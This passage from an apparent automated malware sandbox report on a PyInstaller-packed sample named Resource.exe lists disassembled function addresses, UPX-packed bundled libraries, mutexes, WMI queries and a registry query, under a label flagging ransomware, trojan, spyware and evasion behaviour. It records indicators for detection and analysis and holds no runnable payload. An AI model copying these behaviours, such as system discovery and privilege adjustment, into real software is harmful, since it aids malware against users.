              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A93199A01_2_00007FF8A93199A0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A931DE301_2_00007FF8A931DE30
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D15411_2_00007FF8A92D1541
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D15911_2_00007FF8A92D1591
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92FBD801_2_00007FF8A92FBD80
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D21F31_2_00007FF8A92D21F3
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A93972001_2_00007FF8A9397200
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D24EB1_2_00007FF8A92D24EB
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D149C1_2_00007FF8A92D149C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D13DE1_2_00007FF8A92D13DE
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A93433301_2_00007FF8A9343330
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92E76301_2_00007FF8A92E7630
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D21D51_2_00007FF8A92D21D5
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1C121_2_00007FF8A92D1C12
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D15551_2_00007FF8A92D1555
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E021101_2_00007FF8B7E02110
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7DF18F01_2_00007FF8B7DF18F0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7DF10001_2_00007FF8B7DF1000
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7DF12B01_2_00007FF8B7DF12B0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E1A0E81_2_00007FF8B7E1A0E8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E19AA81_2_00007FF8B7E19AA8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E189C81_2_00007FF8B7E189C8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E1A4341_2_00007FF8B7E1A434
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E157501_2_00007FF8B7E15750
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E1830C1_2_00007FF8B7E1830C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E1B6BC1_2_00007FF8B7E1B6BC
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E196B01_2_00007FF8B7E196B0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E406901_2_00007FF8B7E40690
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E510601_2_00007FF8B7E51060
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E66DC01_2_00007FF8B7E66DC0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B8AF82901_2_00007FF8B8AF8290
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF8476D3DAA14_2_00007FF8476D3DAA
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D0A2C103_2_00007FF6185D0A2C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F7B24103_2_00007FF6185F7B24
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CABA0103_2_00007FF6185CABA0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185EAE10103_2_00007FF6185EAE10
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D1180103_2_00007FF6185D1180
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185C82F0103_2_00007FF6185C82F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D54C0103_2_00007FF6185D54C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CB540103_2_00007FF6185CB540
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185C1884103_2_00007FF6185C1884
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185ED97C103_2_00007FF6185ED97C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186069FD103_2_00007FF6186069FD
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185C49B8103_2_00007FF6185C49B8
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618605A70103_2_00007FF618605A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185FFA6C103_2_00007FF6185FFA6C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CCB14103_2_00007FF6185CCB14
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61862AAC0103_2_00007FF61862AAC0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618619B98103_2_00007FF618619B98
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618604B38103_2_00007FF618604B38
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D8C30103_2_00007FF6185D8C30
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618605C8C103_2_00007FF618605C8C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F0D20103_2_00007FF6185F0D20
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CDD04103_2_00007FF6185CDD04
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618616D0C103_2_00007FF618616D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E9D0C103_2_00007FF6185E9D0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618609D74103_2_00007FF618609D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D1E04103_2_00007FF6185D1E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CEE08103_2_00007FF6185CEE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618611DCC103_2_00007FF618611DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61860EEA4103_2_00007FF61860EEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CCE84103_2_00007FF6185CCE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61861FE74103_2_00007FF61861FE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D8E68103_2_00007FF6185D8E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61860AE50103_2_00007FF61860AE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185C9EFC103_2_00007FF6185C9EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185FAF0C103_2_00007FF6185FAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61862AF90103_2_00007FF61862AF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F5F4C103_2_00007FF6185F5F4C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D3030103_2_00007FF6185D3030
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185FC00C103_2_00007FF6185FC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61862DFD8103_2_00007FF61862DFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618604FE8103_2_00007FF618604FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185EC05C103_2_00007FF6185EC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F0074103_2_00007FF6185F0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F8040103_2_00007FF6185F8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E0104103_2_00007FF6185E0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186200F0103_2_00007FF6186200F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618602164103_2_00007FF618602164
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185DE21C103_2_00007FF6185DE21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186081CC103_2_00007FF6186081CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186241CC103_2_00007FF6186241CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186002A4103_2_00007FF6186002A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618612268103_2_00007FF618612268
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E7244103_2_00007FF6185E7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CF24C103_2_00007FF6185CF24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61861832C103_2_00007FF61861832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618611314103_2_00007FF618611314
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185C42E0103_2_00007FF6185C42E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185DD2C0103_2_00007FF6185DD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D2360103_2_00007FF6185D2360
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F0374103_2_00007FF6185F0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185EC3E0103_2_00007FF6185EC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185ED458103_2_00007FF6185ED458
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618605468103_2_00007FF618605468
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185CA504103_2_00007FF6185CA504
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185FF59C103_2_00007FF6185FF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D8598103_2_00007FF6185D8598
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185EF5B0103_2_00007FF6185EF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61861260C103_2_00007FF61861260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F65FC103_2_00007FF6185F65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618617660103_2_00007FF618617660
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618602700103_2_00007FF618602700
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185FA710103_2_00007FF6185FA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618600710103_2_00007FF618600710
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D86C4103_2_00007FF6185D86C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186286D4103_2_00007FF6186286D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E67E0103_2_00007FF6185E67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D17C8103_2_00007FF6185D17C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6186118A8103_2_00007FF6186118A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185C8884103_2_00007FF6185C8884
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185D2890103_2_00007FF6185D2890
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185FD91C103_2_00007FF6185FD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F0904103_2_00007FF6185F0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61860190C103_2_00007FF61860190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185F38E8103_2_00007FF6185F38E8
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF6E60A2B30 appears 47 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8B7E1DAF0 appears 46 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934CD8F appears 330 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A87D9D60 appears 155 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934CD9B appears 39 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934CE79 appears 49 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A87D8C40 appears 31 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934D545 appears 39 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934D551 appears 69 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934CF69 appears 31 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A87D8E10 appears 128 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A87FFEC0 appears 38 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8B7E1DC10 appears 83 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A92D132A appears 519 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8B7E58568 appears 152 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8A934CDA1 appears 1188 times
              Source: C:\Users\user\Desktop\Resource.exeCode function: String function: 00007FF8B7E584D8 appears 35 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: String function: 00007FF6186049F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: String function: 00007FF6185D8444 appears 48 times
              Source: Resource.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: Resource.exe, 00000000.00000003.2016619033.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2016535056.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2019287428.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2019633283.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2015982249.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2015760387.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2016385260.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2019397259.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2016211296.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2016081107.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2015892207.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2018048901.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2016286257.00000203A2F43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs Resource.exe
              Source: Resource.exe, 00000000.00000003.2016456861.00000203A2F44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2487238421.00007FF8B9F6C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2486636553.00007FF8B8F92000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2481081086.00007FF8A829B000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2486397800.00007FF8B8B4C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2485286720.00007FF8B7E03000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2486844907.00007FF8B93D8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2484391036.00007FF8A8F2B000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2487700172.00007FF8BFAC7000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2482832538.00007FF8A8799000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs Resource.exe
              Source: Resource.exe, 00000001.00000002.2487039131.00007FF8B984C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs Resource.exe
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Users\user\Desktop\Resource.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\Resource.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989650991958289
              Source: libssl-3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923451741536459
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9992887181541107
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9971625026106934
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9942873714221825
              Source: classification engineClassification label: mal100.rans.troj.adwa.spyw.expl.evad.winEXE@200/57@4/2
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60A8560 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF6E60A8560
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185DEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,103_2_00007FF6185DEF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61860B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,103_2_00007FF61860B57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF6185E3144 GetDiskFreeSpaceExW,103_2_00007FF6185E3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
              Source: C:\Users\user\Desktop\Resource.exeMutant created: \Sessions\1\BaseNamedObjects\J
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4276:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5628:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:412:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5520:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
              Source: C:\Users\user\Desktop\Resource.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI66322Jump to behavior
              Source: Resource.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
